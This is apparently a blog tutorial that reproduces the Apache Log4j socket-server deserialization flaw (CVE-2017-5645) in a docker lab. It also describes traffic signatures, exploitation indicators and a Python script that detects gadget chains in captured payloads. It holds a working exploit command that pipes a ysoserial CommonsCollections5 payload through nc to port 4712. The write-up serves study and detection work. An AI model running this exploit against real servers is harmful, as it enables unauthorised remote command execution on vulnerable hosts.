Apache Log4j Server deserialization command execution vulnerability (CVE-2017-5645) (detailed vulnerability reproduction process)

Table of contents

1. Vulnerability introduction

2. Vulnerability environment construction

3. Exploiting vulnerabilities

4. Vulnerability traffic characteristics

1. Vulnerability introduction

CVE-2017-5645 is a deserialization command execution vulnerability in the Apache Log4j socket server (Log4j 2.x before 2.8.2). The TcpSocketServer and UdpSocketServer components receive serialized log events from other applications and read them with a plain ObjectInputStream, so anyone who can reach the listening port can send a crafted serialized object (a gadget chain) that executes arbitrary commands on the server during deserialization, without any authentication.

2. Vulnerability environment construction

Enter the directory that contains the vulnerable environment's docker-compose file and start the environment: docker-compose up -d

Check the running status of the container: docker ps -a

After the environment starts, the container exposes a TCP service on port 4712 (the Log4j socket server). At this point the vulnerable environment is ready; building it with docker is that simple.

3. Exploiting vulnerabilities

Scan the ports opened by the target: nmap your-ip -p 4712

Port 4712 is open. The socket server has no handshake or application protocol of its own; it simply deserializes whatever objects arrive on the connection, so we can generate a payload with ysoserial and write it directly to your-ip:4712.

ysoserial introduction:

ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common Java libraries that, under the right conditions, can be exploited against Java applications performing unsafe deserialization of objects. (Friends who do not have the tool can message me privately.)

Download the packaged jar file (ysoserial-all.jar) to the Kali host.

Run the command:

java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

This command makes the target create a file named success in its /tmp directory. The socket server sends nothing back to the client, so the only way to confirm execution is to check for the file on the target machine.

Go to the target machine and check whether the file was created, i.e. whether the command was executed.

View container id: docker ps -a

Open a shell inside the container: docker exec -it [container id] /bin/bash

Then enter the tmp directory (cd /tmp) and list its contents (ls). The success file is there, which shows that touch /tmp/success was executed successfully.

At this point, the vulnerability has been reproduced.

4. Vulnerability traffic characteristics

1. The socket server speaks no application protocol of its own: a client opens a TCP connection to the listening port (4712 in this environment) and writes Java-serialized objects. Attack traffic is therefore a single connection whose payload is a raw Java serialization stream, recognisable by its first four bytes ac ed 00 05 (STREAM_MAGIC followed by STREAM_VERSION).

2. A legitimate client only ever sends serialized log events. A ysoserial payload instead carries the class names of a deserialization gadget chain in plain ASCII inside the stream, for the CommonsCollections5 chain used above for example javax.management.BadAttributeValueExpException, org.apache.commons.collections.map.LazyMap and org.apache.commons.collections.functors.InvokerTransformer, together with the method names used to reach Runtime.exec (getRuntime, getMethod, invoke, exec) and the command itself (touch /tmp/success) as a plaintext string.

3. In a real attack the command usually stages a second step (downloading a tool, opening a reverse shell, exfiltrating data), so a successful exploit is often followed by an unexpected outbound connection from the Java process, possibly carrying a large volume of data.

Because the socket server returns nothing to the client, the request alone does not tell you whether the attack worked. Confirmation comes from the target: the application's console output or log files, and the state of the host.

Indicators that the vulnerability has been exploited:

The socket server's output contains exceptions raised while deserializing an unexpected object. A ClassNotFoundException for a gadget class that is not on the classpath indicates a failed attempt; a ClassCastException because the object was not a log event appears only after the object was fully deserialized, which is exactly when a gadget chain runs, so it indicates an attempt that very likely succeeded.

Child processes spawned by the Java process (the command runs as a child of the JVM), and files or changes it leaves behind, such as the /tmp/success file above.

Unknown network connections on the system, especially connections to or from malicious IP addresses.

Unknown listening ports on the server, which may be a bind shell or a second-stage tool.
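As an added example (not part of the original post), the following Python script applies the traffic characteristics above to a captured TCP payload: it checks for the Java serialization header, pulls the class-descriptor and string entries out of the stream, and flags the known CommonsCollections gadget classes. The stream it analyses is a constructed, cut-down stand-in for a CommonsCollections5 payload (same class names and strings, zeroed serialVersionUIDs, no field data), not real ysoserial output; the GADGET_CLASSES list and the extraction heuristic are the example's own assumptions.

```python
"""Heuristic inspection of raw TCP payloads sent to a Log4j socket server (port 4712
in the environment above) for Java-deserialization RCE attempts. Added example."""
from __future__ import annotations

import re
import struct

# Every Java serialization stream starts with STREAM_MAGIC (0xACED) + STREAM_VERSION (5).
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT, TC_CLASSDESC, TC_STRING = 0x73, 0x72, 0x74
TC_ENDBLOCKDATA, TC_NULL = 0x78, 0x70

# Classes used by the ysoserial CommonsCollections chains (the first six make up
# CommonsCollections5). A legitimate client only sends log events, so any of these
# on the socket-server port is an attack. Assumption: this list is the example's own.
GADGET_CLASSES = {
    "javax.management.BadAttributeValueExpException",
    "org.apache.commons.collections.keyvalue.TiedMapEntry",
    "org.apache.commons.collections.map.LazyMap",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections4.functors.InvokerTransformer",
    "sun.reflect.annotation.AnnotationInvocationHandler",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
}

# Java binary class names, including array forms such as "[Lpkg.Type;".
CLASS_NAME_RE = re.compile(rb"(?:\[+L)?[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+;?")
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]+")


def _scan_utf(stream: bytes, tag: int, pattern: re.Pattern) -> list:
    """Collect UTF entries introduced by `tag` (tag byte, 2-byte big-endian length,
    bytes). This is a heuristic scan, not a full ObjectInputStream parser: the length
    cap and the pattern reject most accidental matches inside binary data."""
    found = []
    i = 0
    while i + 3 <= len(stream):
        if stream[i] == tag:
            (length,) = struct.unpack(">H", stream[i + 1:i + 3])
            body = stream[i + 3:i + 3 + length]
            if 0 < length <= 255 and len(body) == length and pattern.fullmatch(body):
                found.append(body.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return found


def analyse_payload(stream: bytes) -> dict:
    """Classify one captured TCP payload that was sent to the socket server."""
    if not stream.startswith(JAVA_STREAM_MAGIC):
        return {"java_serialized": False, "classes": [], "strings": [],
                "gadget_hits": [], "verdict": "not a Java serialization stream"}
    classes = _scan_utf(stream, TC_CLASSDESC, CLASS_NAME_RE)
    strings = _scan_utf(stream, TC_STRING, PRINTABLE_RE)
    hits = [name for name in classes if name in GADGET_CLASSES]
    verdict = ("deserialization gadget chain (likely RCE attempt)" if hits
               else "serialized object, no known gadget class")
    return {"java_serialized": True, "classes": classes, "strings": strings,
            "gadget_hits": hits, "verdict": verdict}


def _utf(tag: int, text: str) -> bytes:
    data = text.encode("ascii")
    return bytes([tag]) + struct.pack(">H", len(data)) + data


def build_sample_stream(command: str) -> bytes:
    """CONSTRUCTED sample, not ysoserial output: a cut-down stream carrying the class
    descriptors and method/command strings a CommonsCollections5 payload contains,
    with zeroed serialVersionUIDs and empty field lists."""
    chain = [
        "javax.management.BadAttributeValueExpException",
        "org.apache.commons.collections.keyvalue.TiedMapEntry",
        "org.apache.commons.collections.map.LazyMap",
        "org.apache.commons.collections.functors.ChainedTransformer",
        "[Lorg.apache.commons.collections.Transformer;",
        "org.apache.commons.collections.functors.ConstantTransformer",
        "org.apache.commons.collections.functors.InvokerTransformer",
    ]
    out = bytearray(JAVA_STREAM_MAGIC + bytes([TC_OBJECT]))
    for name in chain:
        # classDesc: name, serialVersionUID (8 bytes), flags, field count, end, superclass
        out += _utf(TC_CLASSDESC, name) + b"\x00" * 8 + b"\x02\x00\x00"
        out += bytes([TC_ENDBLOCKDATA, TC_NULL])
    for text in ("getRuntime", "getMethod", "invoke", "exec", command):
        out += _utf(TC_STRING, text)
    out += bytes([TC_ENDBLOCKDATA])
    return bytes(out)


if __name__ == "__main__":
    report = analyse_payload(build_sample_stream("touch /tmp/success"))
    print(report["verdict"])
    for name in report["gadget_hits"]:
        print("  gadget class:", name)
    print("  strings:", report["strings"])
```

To run it against real traffic, extract the TCP payload of the connection to port 4712 (for example Follow TCP Stream in Wireshark, saved as raw bytes) and pass the bytes to analyse_payload(). Because the scan is heuristic rather than a full ObjectInputStream parser, treat a hit as a trigger to inspect the target as described above, not as proof that the command ran.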


Origin blog.csdn.net/m0_52701599/article/details/129984156